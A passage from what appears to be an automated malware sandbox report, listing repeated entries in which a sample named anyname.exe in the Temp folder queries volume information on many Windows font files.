                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
